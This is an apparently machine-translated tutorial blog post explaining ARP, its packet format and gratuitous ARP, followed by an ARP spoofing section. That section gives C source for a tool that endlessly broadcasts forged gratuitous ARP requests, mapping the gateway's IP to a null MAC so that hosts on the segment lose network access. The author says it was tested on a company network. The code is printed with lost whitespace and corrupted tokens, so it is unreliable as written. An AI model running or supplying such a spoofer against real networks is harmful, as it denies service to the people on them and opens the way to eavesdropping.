Talking about ARP protocol and its application

0. Preface

This chapter mainly introduces the protocol format of ARP, how the host sends and processes ARP messages, and the free ARP.

1. Principle of ARP protocol

ARP, full name address Resolution Protocol, addresses Resolution protocol, in the network, there is an IP address and MAC address, at the link layer to send messages using the MAC hardware address, then need to convert the IP address to 48bit MAC address, This will use the ARP protocol.

As below, there are two hosts, 239 hosts Ping to 238 hosts. When the local ARP cache does not have an entry for the 238 host, an ARP broadcast request is initiated, then the ARP cache is viewed using the ARP command, and you can see the MAC for the 238 host.

Using the Tcpdump tool to view the underlying data stream under Linux, you can learn:

The sequence diagram and the ARP cache are as follows:

To view the ARP cache results on a 239 host:

2. ARP protocol format

For the ARP Protocol message format information (Figure Baidu obtained), here as above example, sent the ARP request message, the Ethernet source address is 239 host, and the Ethernet destination address is FF:FF:FF:FF:FF:FF, the sending side Ethernet address and IP address is 239 host, Destination Ethernet address is full 0, destination IP address is 172.16.17.238

3. Free ARP

Gratuitous ARP, the host sends to find its own ARP address, that is, the host sends the destination IP address and the sender IP address are for itself, and the Ethernet source address and destination Ethernet address, the sending end of the Ethernet address is its own MAC address, The Ethernet header Ethernet Destination address is broadcast FF:FF:FF:FF:FF:FF.

This has two functions, one is to find if there is IP duplication, and the other is to change the host ARP cache corresponding to the same network segment MAC address.

For the role two, there are several uses, can be used as a primary and standby switch, that is, the host and Standby machine share a VIP (Virtual IP), when the other server ARP cache to save a map, VIP--host Mac, when the standby machine detects the host outage, then send free ARP, Update other server ARP caches to form VIP-to-standby Mac mappings, thus completing simple disaster preparedness.

One of the exceptions is the use of ARP spoofing, data eavesdropping, and so on.

4. ARP Spoofing

The principle is to use ARP to achieve. Can be used as an attack host or router, so that it can not surf the internet, and so on, the principle of network law enforcement officer is such. The following program implements a simple, free ARP that changes the mapping of the gateway in the host ARP cache under the same network segment (172.16.17.*) and maps its cache to a nonexistent MAC address.

The following program uses the C implementation, which uses the socket to create a socket of type Af_packet to manipulate the link layer data directly. has been tested in the company's internal network.

#include <sys/socket.h>#include<sys/types.h>#include<netpacket/packet.h>#include<net/ethernet.h>#include<linux/if_ether.h>#include<string.h>#include<arpa/inet.h>#include<stdlib.h>#include<assert.h>#include<stdio.h>#include<net/if.h>#include<errno.h>#defineHard_type_ether 0x01//Hardware Type#defineProtocol_ip 0x01//IP protocol Type#defineMac_addr_len 0x06//Hardware Address Length#defineIp_addr_len 0x04//IP Address Length#defineArp_op_request 0x01//ARP Request operation#defineArp_op_response 0x02//ARP response operation//ARP Messagestypedefstructarppkg{unsigned ShortShardtype;//Hardware TypeUnsigned ShortSprotocoltype;//protocol TypeUnsignedCharChardaddrlen;//Hardware Address LengthUnsignedCharCipaddrlen;//mapped protocol address lengthUnsigned ShortSoptype;//type of OperationunsignedCharasendmac[6];//Sender MAC AddressUnsignedCharasendip[4];//Sender IP AddressUnsignedCharadstmac[6];//Destination MAC addressUnsignedCharadstip[4];//Destination IP Address} arppkg;//converts a native byte order to a network byte order//and returns the offset lengthintHosttonetbyte (Char*pnet, unsignedChar*ahostbyte,intNlen) {    intI, J;  for(i = Nlen-1, j =0; I >=0; -I. J + +) {Pnet[j]=Ahostbyte[i]; }    returnJ;}Static intGethex (CharCASC) {    if(IsDigit (CASC))returnCASC-'0'; if(Isalpha (CASC)) CASC= ToLower (CASC)-'a'; returnCASC +Ten;}//convert ASC to HexintAsctohex (Const Char*PASC,Char*phex,int*Phexlen) {    intI, Nhexlen; intNasclen =strlen (PASC);  for(i =0, Nhexlen =0; i < Nasclen; i + =2) {Phex[nhexlen+ +] = (Gethex (pasc[i]) <<4) | (Gethex (Pasc[i +1]) &0xF);//High byte | low byte    }    *phexlen =Nhexlen; return 0;}//Convert string to hex and then to network byte orderintAsctonetbyte (Char*PASC, unsignedChar*pnetbyte) {unsignedCharahostbyte[7]; intNhostbytelen =sizeof(Ahostbyte); Asctohex (PASC, (Char*) Ahostbyte, &Nhostbytelen); returnhosttonetbyte (Pnetbyte, Ahostbyte, Nhostbytelen);}//group ARP message and return the message lengthintBuildarppkg (arppkg * parppkg,Char*pPkg) {    intNPos =0; NPos+ = Hosttonetbyte (pPkg + NPos, (Char*) &parppkg->shardtype,2); NPos+ = Hosttonetbyte (pPkg + NPos, (Char*) &parppkg->sprotocoltype,2); Ppkg[npos+ +] = parppkg->Chardaddrlen; Ppkg[npos+ +] = parppkg->Cipaddrlen; NPos+ = Hosttonetbyte (pPkg + NPos, (Char*) &parppkg->soptype,2); NPos+ = Hosttonetbyte (pPkg + NPos, Parppkg->asendmac,6); NPos+ = Hosttonetbyte (pPkg + NPos, Parppkg->asendip,4); NPos+ = Hosttonetbyte (pPkg + NPos, Parppkg->adstmac,6); NPos+ = Hosttonetbyte (pPkg + NPos, Parppkg->adstip,4); returnNPos;}//initializing ARP Public informationStatic voidInitarpcommfield (arppkg * parppkg,intNoptype) {parppkg->shardtype = Hard_type_ether;//Ethernet TypeParppkg->sprotocoltype = eth_p_ip;//IP Packet ProtocolParppkg->chardaddrlen =Mac_addr_len; Parppkg->cipaddrlen =Ip_addr_len; Parppkg->soptype =Noptype;}//Group ARP Request messageintBuildarprequest (unsignedChar*ppkg,Char*PSENDMACSTR,Char*PSENDIPSTR,Char*PDSTMACSTR,Char*pdstipstr)    {arppkg starppkg; memset (&starppkg,0,sizeof(arppkg)); Initarpcommfield (&starppkg, arp_op_request);    Asctonetbyte (Psendmacstr, Starppkg.asendmac);    Asctonetbyte (Psendipstr, Starppkg.asendip);    Asctonetbyte (Pdstmacstr, Starppkg.adstmac);    Asctonetbyte (Pdstipstr, Starppkg.adstip); returnBuildarppkg (&starppkg, pPkg);}intMainintargcChar Const*argv[]) {    Char*pmac ="ffffffffffff";//Purpose Mac Broadcast    Char*pdstip ="Ac1011fe";//Destination IP 172.16.17.254    Char*ptrickmac ="000000000000";//Fake Mac    Char*ptrickip ="Ac1011fe";//the ip,172.16.17.254 of disguiseUnsignedCharamacbyte[7]; intNFd = socket (Af_packet, SOCK_DGRAM,0); //Initialize link address information    structSockaddr_ll sockaddr; memset (&AMP;SOCKADDR,0,sizeof(structsockaddr_ll)); Sockaddr.sll_family=htons (Af_packet); Sockaddr.sll_protocol=htons (ETH_P_ARP); Sockaddr.sll_halen= Htons (6);    Asctonetbyte (Ptrickmac, amacbyte); memcpy (Sockaddr.sll_addr, Amacbyte,6); Sockaddr.sll_ifindex= Iff_broadcast;//Broadcast//Create a free ARP Request messageUnsignedCharapkg[ -] = {0}; intNpkglen =buildarprequest (aPkg, Ptrickmac, Ptrickip, PMac, Pdstip); //To send an ARP request continuously     while(1)    {        intNret = SendTo (NFd, aPkg, Npkglen,0, (structSOCKADDR *) &sockaddr,sizeof(sockaddr)); if(Nret = =-1) {perror ("Error"); Exit (-1); } usleep ( -);    } close (nFd); return 0;}

　　

Talking about ARP protocol and its application